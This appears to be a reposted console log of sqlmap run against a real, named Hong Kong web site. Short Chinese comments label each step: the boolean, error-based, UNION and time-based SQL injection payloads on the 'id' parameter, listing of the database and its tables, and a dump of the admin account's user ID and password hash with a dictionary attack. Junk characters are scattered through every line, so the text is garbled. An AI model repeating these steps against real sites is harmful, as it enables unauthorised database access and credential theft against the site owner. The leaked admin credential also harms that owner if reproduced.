D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ s/ L. o# S. n5 a- tms "Mysql" --current-user /* 注解:获取当前用户名称+ l. o( X. a' {' p1 d5 H `7 M
sqlmap/0.9 - automatic SQL injection and database takeover tool
1 `, l" @( C S0 S http://sqlmap.sourceforge.net starting at: 16:53:549 a$ y$ a& B# n1 r8 i! d4 M
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ z$ u; O( d7 M L
session file+ B6 ~8 L, o% T1 K, A }: ~
[16:53:54] [INFO] resuming injection data from session file3 x' f" N7 o4 @7 C9 d( A
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 i R1 N. x0 W: L$ ^[16:53:54] [INFO] testing connection to the target url
% W; h$ d" o0 [9 i" T& Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
% x ~! c# o5 A3 |5 Dsts:
# @8 l# G7 T' F4 R0 v4 S9 o---
" n% v* T" X3 }' Z, VPlace: GET. l, _ `( o: p- m( \+ b/ u R! ~% W
Parameter: id
% w+ ~; D1 M2 d6 F9 Q" E4 l9 O Type: boolean-based blind% m, h' q4 I- u' _2 s( u' w, m' R
Title: AND boolean-based blind - WHERE or HAVING clause
, f7 I5 r: u4 ]/ _ Payload: id=276 AND 799=7998 C6 W( f/ v! J& P; W2 w) B. ?: i) k
Type: error-based
5 a. s# q9 U" Q- ?2 z' Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 q$ P7 a- b+ x# t- _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& `! s# O$ m; y. r2 _9 u3 v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, U* l$ O& f: S, [0 d, O7 T8 K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& z+ J' I8 B. f! m6 h& C% T. D Type: UNION query) f" W. a) O* e0 `; }5 V# a2 J. z ]) w4 c
Title: MySQL UNION query (NULL) - 1 to 10 columns
/ W8 L) l) i6 {- [" s+ N( c- @ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) d' {( f" R9 W# Q* N# R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 N( f/ M) x% D- I5 R, D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) t- q' d, m3 C8 @ Type: AND/OR time-based blind
: P% t: b! `" u* c Title: MySQL > 5.0.11 AND time-based blind Y& U" _: u9 j6 v- A/ V+ }
Payload: id=276 AND SLEEP(5)& N: K, o' j! D7 G; k' P w
---
7 A( w& `+ ~3 o; W7 }[16:53:55] [INFO] the back-end DBMS is MySQL
) j1 W' _* w. Wweb server operating system: Windows
+ z2 K5 M ?- tweb application technology: Apache 2.2.11, PHP 5.3.0
& |" a' @/ ]0 Q7 t% Pback-end DBMS: MySQL 5.0
! i; V% q: {& v; R[16:53:55] [INFO] fetching current user @$ h8 Q `6 l
current user: 'root@localhost'
6 b! @! n0 l4 X1 E0 C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 q5 Z7 K* t0 }. i, A6 g' `
tput\www.wepost.com.hk' shutting down at: 16:53:58, e, R: a* _/ e8 C) H4 ^# g
( O: M. ]0 [1 A1 f0 [1 w, xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% F; w O( R/ F. O1 {' b6 ^3 Mms "Mysql" --current-db /*当前数据库
/ g/ T+ W3 X2 I+ h: p5 m. B H8 o sqlmap/0.9 - automatic SQL injection and database takeover tool' A3 n {9 w8 Z$ ]% m k
http://sqlmap.sourceforge.net starting at: 16:54:16
5 `% ?3 H& v8 U0 N( B# t[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 T+ {' b' H! s5 S+ \: {
session file
1 h. w: E: Z% f( q[16:54:16] [INFO] resuming injection data from session file T* g, d2 ?' k, l4 N
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' h8 m6 z' u& |' o: u. \[16:54:16] [INFO] testing connection to the target url: I0 b# w5 u+ [ _8 b6 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque# i$ e' J0 v7 {3 t% @4 i4 g
sts:& Y1 K7 f i! K" U3 r0 o6 c6 g5 b
---: c! k, p' u' v, u3 R
Place: GET
% n' \: v/ F/ a( Q& VParameter: id; I. x8 p8 e) A+ k/ A% Q
Type: boolean-based blind) e# }9 f: H7 m7 u7 S! t9 X
Title: AND boolean-based blind - WHERE or HAVING clause; q1 X9 f) D' J/ }
Payload: id=276 AND 799=799
! [/ f" U. z7 q5 v' K' D$ W Type: error-based# z* k) j" E0 i7 N! r: U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 d7 b. p+ D) N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ W) i, {( P, I: m! |2 n# @/ E2 ]" m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ Y+ K# U9 W. w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 O" z% M# p4 n- [2 B2 Q Type: UNION query, J% t0 |# x5 w6 K/ B: t: E
Title: MySQL UNION query (NULL) - 1 to 10 columns1 b, {$ F: s/ }
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR }8 g3 D% f# z- N1 L; M! D% ^: D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- \, n2 h% H8 F! y
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 Q5 R. Z; Z' b8 q( f3 q
Type: AND/OR time-based blind
5 Y" p2 k& J X' I Title: MySQL > 5.0.11 AND time-based blind8 r* i; N7 J( L( s
Payload: id=276 AND SLEEP(5)( w$ D1 |" k# k |
---
3 n7 f5 Q1 {3 }0 D0 j1 z3 L. P! a$ a9 x[16:54:17] [INFO] the back-end DBMS is MySQL# y+ y: S1 X: e. Z
web server operating system: Windows
5 X# R" \) V0 H2 W5 xweb application technology: Apache 2.2.11, PHP 5.3.0
3 f% o2 Y1 i6 |2 s" L# Q/ Vback-end DBMS: MySQL 5.09 @6 ^! I, B3 q; R0 K* b' T
[16:54:17] [INFO] fetching current database, ]! {6 p& d& b2 S) q
current database: 'wepost'
! z: N" ?- L$ U$ P2 x/ U* m! R[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou. d6 |9 G- b) ^
tput\www.wepost.com.hk' shutting down at: 16:54:18
9 x/ ^4 n# H* M& [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 M2 Q; T9 D1 V
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
/ b- B8 c+ a8 N1 J$ h1 P sqlmap/0.9 - automatic SQL injection and database takeover tool
2 K6 m, I2 P# W3 V: S" p http://sqlmap.sourceforge.net starting at: 16:55:25
2 [3 w: Z+ o' w W4 ]. l f' g# _$ s5 n[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" q/ ?3 k" L( P8 ?4 u0 R
session file
* E( r7 H" U" n6 [[16:55:25] [INFO] resuming injection data from session file! z4 e+ x k# b0 \- x4 H
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) |% J, c) i+ ?+ O
[16:55:25] [INFO] testing connection to the target url7 Y9 ^ x3 E5 U- W, d5 o/ ^# D! q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. K% W2 n( C3 q" w: f' } Ests:
- K' J( h+ _( {' J! I' _4 ^---" a( h: Z8 c' {4 a; d$ Q
Place: GET' n( G' a7 B. T8 j" @6 O
Parameter: id7 H- y0 V8 X; s& T5 a) L: ~
Type: boolean-based blind
* w/ Q, L, D9 q; H0 e; T Title: AND boolean-based blind - WHERE or HAVING clause1 H& Z* i/ y F8 ^
Payload: id=276 AND 799=7994 U4 n Q8 z" ~
Type: error-based8 X$ ~' M+ ?7 o" z* m" L' G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% M" @6 @4 ^8 l8 s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," O3 O6 B' c% \5 |; r7 p/ h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: ]7 D: |* l3 X2 a* C d# z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& H' B+ _2 @( }* g+ O. C Type: UNION query
0 N4 f, y% D# v" j; B$ A% X5 w1 e Title: MySQL UNION query (NULL) - 1 to 10 columns
: J. ^* u8 U5 {( e+ Z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; @. @0 V. i* ?0 \4 A0 J* c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 F2 w: {% ~5 R7 B. t2 q- M, }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ _! |2 A5 i5 `' d5 G( o' T
Type: AND/OR time-based blind
+ R0 b$ K" _+ E Title: MySQL > 5.0.11 AND time-based blind: q; c0 V. S# o& e
Payload: id=276 AND SLEEP(5)
- O8 x9 z" B8 U9 M7 F4 I: T4 ]---
, S) \( e4 I# b! ]6 m[16:55:26] [INFO] the back-end DBMS is MySQL' N8 A2 x p, K4 W% J2 x
web server operating system: Windows
9 j6 h0 Z8 \6 P0 n' Jweb application technology: Apache 2.2.11, PHP 5.3.0
$ z+ B4 U% \7 _! c+ Jback-end DBMS: MySQL 5.0
$ b* \) v' |! Q* T' b[16:55:26] [INFO] fetching tables for database 'wepost'
. O* ]3 ^+ T. E- T6 l. w0 T[16:55:27] [INFO] the SQL query used returns 6 entries( V y0 x3 @4 w4 I
Database: wepost/ G' Q( g6 @) O/ T8 G; Y
[6 tables]7 X7 }$ Q0 t: M5 R& B1 G$ g
+-------------+
( a* q9 n% f! }! Y& z" O| admin |- ~9 h% g. m+ p2 @
| article |# i! ?- D+ P) V8 x$ j/ G* n1 ^% B2 m
| contributor |* r: M, ~( I, I7 I
| idea |
! Q; s1 B8 \ ?9 I+ b3 a& N: I7 ?% `4 ~| image | T! W, h. M9 R+ l
| issue |" n" h6 z% I k9 d$ i9 o
+-------------+
9 F% E0 Y, F: H5 e[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
( r% ?1 \/ B" Rtput\www.wepost.com.hk' shutting down at: 16:55:33" A2 i9 Y& d/ ?1 {. _& \. c3 b
" f- n# K7 a: \3 h8 v0 Y0 G
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 {$ k6 T* q6 e4 l% A0 f
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
2 x, G' B/ H5 g. q, u3 V' L sqlmap/0.9 - automatic SQL injection and database takeover tool9 T8 R4 Y6 q/ P% n+ U0 v/ ^; f
http://sqlmap.sourceforge.net starting at: 16:56:067 I+ Q e8 ~3 M G4 H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 A2 j5 K5 J9 D2 k/ ?
sts:" t: w0 ]+ l# U
---1 c% @+ o, ]( ]6 F, f) K7 D( p$ r
Place: GET- A" Z0 k# M4 r& |; l
Parameter: id
: B1 c' f W( a% v. ? Type: boolean-based blind
& ]7 }3 B5 ?% g+ ~ Title: AND boolean-based blind - WHERE or HAVING clause$ S( J% x7 `' `, X
Payload: id=276 AND 799=799
9 s: a1 x" ~9 B- P Type: error-based, ]$ R& l2 O1 Z. O7 O0 W* k
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 W% n5 h& d$ Y8 E! @3 E5 ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," }; |; N* @2 d: T) M4 Z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ o6 G' A8 a8 G1 ]! Q4 U9 ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 X% C R' }5 I* \" |4 s
Type: UNION query
" y$ U7 x/ F' k7 D Title: MySQL UNION query (NULL) - 1 to 10 columns1 A& p7 y3 k& A, p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ V3 m* C" D1 q* i& j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," k0 N0 N" u' o! @& t, C( z/ ^
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ h: [$ @/ \& m6 f, i; k, _
Type: AND/OR time-based blind
8 O- t9 @ G# ~) A2 l Title: MySQL > 5.0.11 AND time-based blind
- D- {% @7 y; F4 ]6 i Payload: id=276 AND SLEEP(5)! L% h" x( A4 @, w7 d
---5 j- U) P, i) O# H3 P
web server operating system: Windows/ U, y0 W! r$ h
web application technology: Apache 2.2.11, PHP 5.3.0
2 N( ~7 @; K8 Y f' K0 U- u3 Zback-end DBMS: MySQL 5.0
& d4 S% o1 l. I" g[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ n! x9 n6 a- X0 X
ssion': wepost, wepost" L7 P5 Z4 |" {5 E; ~
Database: wepost
4 }/ Y4 v. O: ~* b4 h6 G9 KTable: admin
. [. P6 W6 L' F+ e, H[4 columns]2 H9 ^2 L) _/ e% v' q8 j0 ]
+----------+-------------+# Z5 A9 j% V4 ], [/ D
| Column | Type |
6 P. [* x$ e( H9 g# {7 {% l- \! Q1 e+----------+-------------+; ^* n4 v( `3 y# g6 Q5 s# i0 p- b
| id | int(11) |
6 ~4 t0 [2 ]5 U9 c, r| password | varchar(32) |
- \3 q5 b- K$ M$ K1 X/ s! _2 G| type | varchar(10) |
b" h! B: B5 b) C| userid | varchar(20) |
8 `3 \; j# p3 S& ?( y; N2 q! M+----------+-------------+ M) O' w; F5 y" ?/ { B) y4 Y
shutting down at: 16:56:19) B2 [* _! P& d, Z `% L/ z
- K. r4 ?/ [- n* d) e# E
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 @# D; m) |1 e+ t* e! d+ ?4 O) }ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容' r, A' b- U/ B, P. `1 ~6 G& h! d* [
sqlmap/0.9 - automatic SQL injection and database takeover tool; k, o, P; ?4 L& q* D% s
http://sqlmap.sourceforge.net starting at: 16:57:14+ n- b' z: {. M* p
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" L. j$ S% t+ B6 I& _
sts:
; c1 ~" p: K3 K2 I3 h---
2 J) J) }) p& u2 F- u; GPlace: GET+ v6 V# X) f4 G+ h0 V; R
Parameter: id! \* E% }3 L; P
Type: boolean-based blind
3 x7 e. [3 F3 L0 y9 @ Title: AND boolean-based blind - WHERE or HAVING clause
3 U! n1 \3 o8 W0 I Payload: id=276 AND 799=7996 D8 y2 E3 i6 L1 y8 b: \
Type: error-based, b R8 E8 D+ s% V
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- x$ `! J- k' ?; K% W2 J+ J
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ U0 H: O4 U2 Y# y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! S0 f, U4 q" f),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 o5 r: G; q2 R! b! [
Type: UNION query
# N& E% B, v3 C. R8 Q6 A Title: MySQL UNION query (NULL) - 1 to 10 columns
4 l5 o* A8 T0 v Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
c0 j4 ~0 \. f y2 _ o# Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. [' F6 J+ Q! |, c7 VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 S: Q& m7 h2 i; g) r! ?8 H+ o
Type: AND/OR time-based blind
( i0 r- |6 d' z3 d( a Title: MySQL > 5.0.11 AND time-based blind
# @: t; T' V/ E- W+ ]; N Payload: id=276 AND SLEEP(5). ?, Y, H/ S% K0 v
---
: x! ~5 }! H K# [. [web server operating system: Windows5 @8 B0 p8 t% X, H
web application technology: Apache 2.2.11, PHP 5.3.02 N. K' c2 \8 D. [" _: r
back-end DBMS: MySQL 5.0- P) D4 p) ?/ b0 @, ?. |4 }
recognized possible password hash values. do you want to use dictionary attack o
. u: x6 q6 w: |n retrieved table items? [Y/n/q] y. Q& \' S8 @ B* \$ \. C
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
' x9 O1 `9 G Ido you want to use common password suffixes? (slow!) [y/N] y
| m1 z! [) g, mDatabase: wepost0 c0 p. b A: D1 x
Table: admin' J5 |7 o. L! P0 {! s: S
[1 entry]+ ]$ Q: J, s/ i1 ~+ ^ X6 W; o
+----------------------------------+------------+
8 n- f$ h9 o$ a' E. e. j! ?! d$ W| password | userid |
/ z# o" [: ]3 k+----------------------------------+------------+7 _& \0 P3 }% s% U% ?1 [
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" y* ?) K6 ~; A/ J+ b0 J+----------------------------------+------------++ L, j; @( f' w* B! t4 k7 p
shutting down at: 16:58:14
+ k* O1 n5 n5 k5 c" B
- m! G# _4 W0 Q0 l8 _5 mD:\Python27\sqlmap> |